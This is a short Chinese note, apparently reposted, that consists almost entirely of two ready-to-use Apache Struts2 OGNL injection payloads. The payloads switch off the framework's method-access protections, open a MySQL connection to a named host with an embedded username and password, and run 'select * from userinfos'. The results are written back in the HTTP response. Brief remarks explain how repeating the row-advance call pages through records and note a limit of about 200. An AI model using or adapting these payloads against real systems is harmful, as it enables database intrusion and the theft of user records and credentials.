('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

第2条,是\43rs.next()%2b\43rs.next() 2个

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()%2b\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

第3个是 3个。

第4个是 4个。\43rs.next()%2b\43rs.next()%2b\43rs.next()%2b\43rs.next()

貌似最多只能200多个。

[原文地址]